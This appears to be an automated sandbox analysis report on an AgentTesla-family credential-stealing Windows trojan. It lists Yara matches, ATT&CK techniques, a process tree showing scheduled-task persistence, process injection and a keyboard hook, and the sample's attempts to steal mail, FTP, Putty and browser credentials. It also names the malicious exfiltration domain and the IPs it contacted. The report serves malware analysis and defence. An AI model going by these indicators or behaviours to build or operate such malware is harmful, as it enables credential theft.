              Source: Yara match | File source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques grouped by tactic column. The digits in front of a technique are the badge counts the report shows beside the techniques it matched; techniques without digits are the matrix's unmatched entries.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 211 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 23 Software Packing; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 111 Process Injection; Indicator Removal from Tools
Credential Access: 2 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 114 System Information Discovery; 311 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 11 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph

Behavior Graph ID: 756116
Sample: SecuriteInfo.com.Win32.Cryp...
Startdate: 29/11/2022
Architecture: WINDOWS
Score: 100

Sample-level signatures:
• Snort IDS alert for network traffic
• Malicious sample detected (through community Yara rule)
• Sigma detected: Scheduled temp file as task from temp location
• 9 other signatures

Process tree (the numbers after a process name are the graph's created-file / created-registry-value badge counts):

SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe (6) started
  Dropped files:
  • C:\Users\user\AppData\...\nrQtAokXKaSn.exe, PE32
  • C:\Users\user\AppData\Local\...\tmp152E.tmp, XML
  • SecuriteInfo.com.W....16043.3621.exe.log, ASCII
  Signatures:
  • Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  • Uses schtasks.exe or at.exe to add and modify task schedules
  • Injects a PE file into a foreign processes
  Child processes:
    SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe (15 3) started
      DNS/IP:
      • strictfacilityservices.com 111.118.212.38, 49717, 49722, 587 PUBLIC-DOMAIN-REGISTRYUS India
      • mail.strictfacilityservices.com
      • 2 other IPs or domains
      Signatures:
      • Installs a global keyboard hook
    schtasks.exe (1) started
      conhost.exe started
    SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe started

nrQtAokXKaSn.exe (5) started
  Signatures:
  • Multi AV Scanner detection for dropped file
  • Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  • May check the online IP address of the machine
  • Machine Learning detection for dropped file
  Child processes:
    nrQtAokXKaSn.exe (14 3) started
      DNS/IP:
      • mail.strictfacilityservices.com
      • 3.232.242.170, 443, 49720 AMAZON-AESUS United States
      • api.ipify.org
      Signatures:
      • Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      • Tries to steal Mail credentials (via file / registry access)
      • Tries to harvest and steal ftp login credentials
      • Tries to harvest and steal browser information (history, passwords, etc)
    schtasks.exe (1) started
      conhost.exe started
    nrQtAokXKaSn.exe started

Antivirus detection, initial sample:
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe; Detection: 32%; Scanner: ReversingLabs; Label: Win32.Trojan.AgentTesla
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe; Detection: 100%; Scanner: Joe Sandbox ML

Antivirus detection, dropped files:
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe; Detection: 100%; Scanner: Joe Sandbox ML
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe; Detection: 32%; Scanner: ReversingLabs; Label: Win32.Trojan.AgentTesla

Antivirus detection, unpacked PE files:
Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack; Detection: 100%; Scanner: Avira; Label: TR/Spy.Gen8
              No Antivirus matches
Domains and IPs contacted:
Name: api.ipify.org.herokudns.com; IP: 52.20.78.240; Active: true; Malicious: false; Reputation: unknown
Name: strictfacilityservices.com; IP: 111.118.212.38; Active: true; Malicious: true; Reputation: unknown
Name: api.ipify.org; IP: unknown; Active: unknown; Malicious: false; Reputation: high
Name: mail.strictfacilityservices.com; IP: unknown; Active: unknown; Malicious: true; Reputation: unknown

URLs contacted:
Name: https://api.ipify.org/; Malicious: false; Reputation: high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://UrUbMY.comnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/s-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comdH-uSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://strictfacilityservices.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.tiro.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/Y001SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.orgmail.strictfacilityservices.comaccountsnrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.galapagosdesign.com/staff/dennis.htm/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.goodfont.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 
00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htm2SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sajatypeworks.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.ipify.orgSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://fontfabrik.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comgritaSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.coms-PSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.ascendercorp.com/typedesigners.html/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.comd--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.fontbureau.comB.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/dSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.comrsiv_-lSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsinrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comasF;-SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.fontbureau.comml-YSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fonts.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sandoll.co.krSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
Name: http://www.carterandcone.com%(
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low
Name: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.urwpp.de
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.sakkal.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.com.TTF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.comalsd
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
